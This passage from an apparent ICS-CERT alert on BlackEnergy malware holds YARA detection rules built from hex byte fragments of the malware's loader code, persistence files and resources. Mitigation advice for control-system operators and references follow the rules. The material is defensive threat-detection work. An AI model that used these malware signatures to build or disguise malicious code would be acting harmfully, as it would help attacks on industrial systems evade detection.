01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E** **00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 20 00 28 00 78 00 70** **00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00 30 00 38 00 35 00 32 00 29 00 00 00 00 00 4A 00 13** **00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70** **00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 00 34 00 00 00 00 00 6A 00 25 00** **01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00** **73 00 6F 00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 65 00 72 00** **61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00** **6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00** **30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00** **6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00** **00 00 00 00 09 04 E4 04}** **condition:** **(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and (((any of ($a*)) and** **(uint32(uint32(0x3C)+8) == 0x00000000)) or (for any of ($b*): ($ in (uint32(uint32(0x3C)+248+(40*** **(uint16(uint32(0x3C)+6)-1)+20))..(uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-** **1)+20))+uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+16)))))))** **}** **rule BlackEnergy2_USBInfected** **//ICS-CERT rule to detect .exe's infected by BlackEnergy JN plugin for JN versions 7 (full), 75 (light)** **//version 1** **{** **strings:** **$f1 = {5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4 33 C9 03 D0 4A 41 3B** **C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66 C7 04 03 5C 20 56** **57 8D 3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 C0 50 68 80 00 00 00 6A 02 50 50 68 00 00 00 40 53 FF 57 14 53 8B 4F 4C** **8B D6 33 DB 30 1A 42 43 3B D9 7C F8 5B 83 EC 04 8B D4 50 6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF 57 18}** **$f2 = {5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08 2B 45 10 89 45 E8 33** **C0 89 45 F4 8B 55 0C 3B 55 F4 0F 86 98 00 00 00 8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC 8B 42 04 83 E8 08** **D1 E8 89 45 F8 8B 4D EC 83 C1 08 89 4D FC}** **$f3 = {5F 8B DF 83 C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF 66 8B 18 66 81 FB 4D** **5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66 8B 19 66 81 FB 50 45 75 E0 8B E8 8B F7 83 EC 60 8B FC B9 60 00** ----- **condition:** **$a1 at entrypoint or any of ($f*)** **}** **rule BlackEnergy3** **//ICS-CERT rule to detect BlackEnergy3 versions 1.1.0 through 1.2.5** **//version 1** **{** **strings:** **//elements from the .LNK file created for persistence** **$l1 = {72 00 75 00 6E 00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 1C 00 00 00** **2C 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 2E 00 2E 00 5C 00 57 00 49 00 4E** **00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 72 00 75 00 6E 00 64 00 6C** **00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00 13 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C** **00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 22 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65** **00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64** **00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 4C 00 6F 00 63 00 61 00 6C 00 20 00 53** **00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E** **00 20 00 44 00 61 00 74 00 61 00 5C}** **//resource from loader file** **$r1 = {78 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 00 00 05 00 6A 44 B1 1D 00 00 05 00 6A 44 B1 1D 3F 00 00 00** **00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D6 02 00 00 01 00 53 00 74 00 72 00 69 00** **6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 B2 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00** **34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00** **00 00 4D 00 69 00 63 00 72 00 6F 00 00 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00** **69 00 6F 00 6E 00 00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00** **69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 53 00 79 00 73 00 55 00 74 00 69 00** **6C 00 69 00 74 00 79 00 00 00 00 00 72 00 29 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00** **6E 00 00 00 00 00 35 00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 20 00 28 00** **77 00 69 00 6E 00 37 00 73 00 70 00 31 00 5F 00 72 00 74 00 6D 00 2E 00 31 00 30 00 31 00 31 00 31 00 39 00 2D 00** **31 00 38 00 35 00 30 00 29 00 00 00 00 00 30 00 08 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00** **61 00 6D 00 65 00 00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 00 00 80 00 2E 00 01 00 4C 00 65 00 67 00 61 00** **6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00** **6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00** **6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2E 00 00 00** **40 00 0C 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00** **00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 2E 00 65 00 78 00 65 00 00 00 58 00 1C 00 01 00 50 00 72 00 6F 00** **64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 53 00 79 00** **73 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 20 00 2D 00 20 00 55 00 6E 00 69 00 63 00 6F 00 64 00 65 00 00 00** **42 00 0F 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 00 00 00 00 35 00** **2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 00 00 00 00 44 00 00 00 01 00 56 00** **61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00** **73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04}** **//sections of code from loader** **$sa1 = {55 8B EC 83 EC 24 53 56 57 C7 45 F8 00 00 00 00 C7 45 F4 64 00 00 00 83 EC 10 C7 45 EC** **5A 00 00 00 C7 45 E0 46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00 6A 01 8D 45 E0 50 E8 2F FC FF FF 89** **45 FC 8B 4D FC 89}** **condition:** **any of them** **}** **rule BlackEnergy_findFunc** **//ICS-CERT rule to detect BlackEnergy2 "light" and BlackEnergy3. Will not detect BE2 sys variant.** **//version 1** **{** **strings:** **$sb1 = {C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C} //ws3_32.dll** **$sb2 = {C7 [1 5] 75 73 65 72 C7 [1 5] 33 32 2E 64 66 C7 [1 5] 6C 6C} //user32 dll** ----- **$sb4 = {C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C} //wininet.dll** **$sb5 = {C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C} //shell32.dll** **$sb6 = {C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C} //psapi.dll** **$sb7 = {C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C} //netapi32.dll** **$sb8 = {C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C} //version.dll** **$sb9 = {C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C} //oldaut32.dll** **$sb10 = {C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C} //imagehlp.dll** **condition:** **3 of them** **}** #### MITIGATIONS **ICS-CERT has published a TLP Amber version of this alert containing additional information about the malware, plug-ins,** **and indicators to the secure portal. ICS-CERT strongly encourages asset owners and operators to use these indicators to** **look for signs of compromise within their control systems environments. Asset owners and operators can request access** **[to this information by emailing ics-cert@dhs.gov](mailto:ics-cert@dhs.gov)** **.** **Any positive or suspected findings should be immediately reported to ICS-CERT for further analysis and correlation.** **ICS-CERT strongly encourages taking immediate defensive action to secure ICS systems using defense-in-depth** **[principles.CSSP Recommended Practices, https://ics-cert.us-cert.gov/Recommended-Practices, web site last accessed](https://ics-cert.us-cert.gov/Recommended-Practices)** **October 28, 2014. Asset owners should not assume that their control systems are deployed securely or that they are not** **operating with an Internet accessible configuration. Instead, asset owners should thoroughly audit their networks for** **Internet facing devices, weak authentication methods, and component vulnerabilities. Control systems often have Internet** **accessible devices installed without the owner’s knowledge, putting those systems at increased risk of attack.** **ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation due to this unsecure** **device configuration of these vulnerabilities. Specifically, users should:** **Minimize network exposure for all control system devices. Control system devices should not directly face the Internet.** **Locate control system networks and devices behind firewalls, and isolate them from the business network.** **If remote access is required, employ secure methods, such as Virtual Private Networks (VPNs), recognizing that VPN** **is only as secure as the connected devices.** **Remove, disable, or rename any default system accounts wherever possible.** **Apply patches in the ICS environment, when possible to mitigate known vulnerabilities.** **Implement policies requiring the use of strong passwords.** **Monitor the creation of administrator level accounts by third-party vendors.** **ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to taking defensive** **measures.** **ICS-CERT also provides a** **[recommended practices section for control systems on the ICS-CERT web site (](http://ics-cert.us-cert.gov/content/recommended-practices)** **http://ics-** **cert.us-cert.gov). Several recommended practices are available for reading or download, including** **Improving Industrial** **Control Systems Cybersecurity with Defense-in-Depth Strategies.** **Organizations that observe any suspected malicious activity should follow their established internal procedures and report** **their findings to ICS-CERT for tracking and correlation against other incidents.** **a.** **b.** **c.** **d.** **e.** **f.** **g.** **ICS-CERT encourages US asset owners and operators to join the control systems compartment of the US-CERT secure portal. To request** **[access to the secure portal send your name, email address, and company affiliation to ics-cert@hq.dhs.gov](mailto:ics-cert@hq.dhs.gov)** **.** **[Sandworm to Blacken: The SCADA Connection, http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-b...](http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/)** **web site last** **accessed October 28, 2014.** **[Sandworm Team – Targeting SCADA Systems, http://www.isightpartners.com/tag/sandworm-team/](http://www.isightpartners.com/tag/sandworm-team/)** **web site last accessed October 28,** **2014.** **[NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4114, web site last accessed October 28, 2014.](http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4114)** **[GE Intelligent Platforms, http://support.ge-ip.com/support/index?page=kbchannel](http://support.ge-ip.com/support/index?page=kbchannel)** **. web site last accessed October 28, 2014.** **[GE, http://www.ge.com/security](http://www.ge.com/security)** **web site last accessed October 28, 2014.** **See “Nov 21, 2014 (second publication) Siemens Industrial Security Website: Update on ICS-CERT Alert on malware targeting SIMATIC** **[WinCC” (http://www.industry.siemens.com/topics/global/en/industrial-security/new...](http://www.industry.siemens.com/topics/global/en/industrial-security/news-alerts/Pages/alerts.aspx)** **)** #### Contact Information **For any questions related to this report, please contact ICS-CERT at:** ----- **For industrial control systems security information and incident reporting:** **[http://ics-cert.us-cert.gov](http://ics-cert.us-cert.gov)** **ICS-CERT continuously strives to improve its products and services. You can help by choosing one of the links below to** **provide feedback about this product.** **Was this document helpful?** **[Yes | Somewhat | No](https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICS-ALERT-14-281-01C&trackingNumber=&url=https://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-281-01B&site_name=ICS-CERT)** ### I Want To **[Report an ICS incident to ICS-CERT](mailto:ics-cert@hq.dhs.gov?Subject=Report an ICS Incident to ICS-CERT)** **[Report an ICS software vulnerability](mailto:ics-cert@hq.dhs.gov?Subject=Report an ICS Software Vulnerability)** **[Get information about Reporting](http://www.dhs.gov/report-cyber-risks)** **[Join the Secure Portal](mailto:ics-cert@hq.dhs.gov?subject=Request to join ICS-CERT Secure Portal&body=Name%3A%0AEmail address%3A%0ACompany Affiliation%3A)** ### Subscribe to Alerts **Receive security alerts, advisories, announcements, and other updates.** **Enter your email address** **Enter your email address** **Sign Up** **Mailing Lists and** **Feeds** ### Contact Us **U.S. Toll Free: (877) 776-7585** **International: (208) 526-0900** **Download PGP/GPG keys** **[ICS-Related Cyber Activity](mailto:ics-cert@hq.dhs.gov?Subject=ICS-Related Cyber Activity)** **[General ICS Questions](mailto:CSCExternalAffairs@hq.dhs.gov)** **Sign Up** **Follow ICS-CERT on** **Twitter** **Home** **FAQ** **[Traffic Light Protocol](http://www.us-cert.gov/tlp/)** **[Privacy & Use](http://www.us-cert.gov/privacy/)** **[Accessibility](http://www.us-cert.gov/accessibility/)** **[Get a PDF Reader](http://www.us-cert.gov/pdf/)** **[US-CERT is part of the Department of Homeland Security.](http://www.dhs.gov)** -----